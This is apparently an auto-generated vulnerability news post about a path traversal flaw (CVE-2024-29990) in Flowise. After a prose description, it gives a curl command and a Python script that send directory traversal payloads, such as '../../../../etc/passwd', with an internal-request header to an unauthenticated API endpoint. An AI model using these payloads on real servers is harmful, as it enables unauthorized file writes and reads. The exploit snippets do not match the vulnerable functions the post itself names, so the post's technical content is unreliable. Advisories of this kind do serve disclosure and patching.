Flowise, Path Traversal, CVE-2024-29990 (Critical)

Listen to this Post

The vulnerability stems from insufficient validation of user-supplied `chatflowid` and `chatId` parameters within multiple API endpoints. In Case 1, the `addBase64FilesToStorage` function uses the unsanitized `chatflowid` from the request body to construct a filesystem path via path.join(getStoragePath(), chatflowid). An attacker can provide a `chatflowid` containing directory traversal sequences (e.g., ../../tmp), causing the application to write a file to an arbitrary, controlled location. In Case 2, the `streamStorageFile` function uses similar unsanitized parameters to generate a path for file retrieval from local storage or cloud buckets (like S3, where `../` is valid), allowing arbitrary file read. The affected endpoints are whitelisted, permitting unauthenticated exploitation.
Platform: Flowise
Version: Pre-1.4.3
Vulnerability: Path Traversal
Severity: Critical

date: 2024-03-26

Prediction: Patch by 2024-04-02

What Undercode Say:

curl -X POST http://localhost:8080/api/v1/chatflows -H "x-request-from: internal" -d '{"id":"../../tmp/pwn", ...}'
const dir = path.join(getStoragePath(), chatflowid) // Vulnerable line

How Exploit:

import requests
url = "http://target:8080/api/v1/chatflows"
data = {"id":"../../../../etc/passwd", "flowData":"{}"}
requests.post(url, json=data, headers={"x-request-from": "internal"})

Protection from this CVE

Update to version 1.4.3. Implement strict UUID validation for all `chatflowId` and `chatId` parameters. Sanitize user input for path construction.

Impact:

Arbitrary File Write

Arbitrary File Read

Remote Code Execution

Data Breach

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top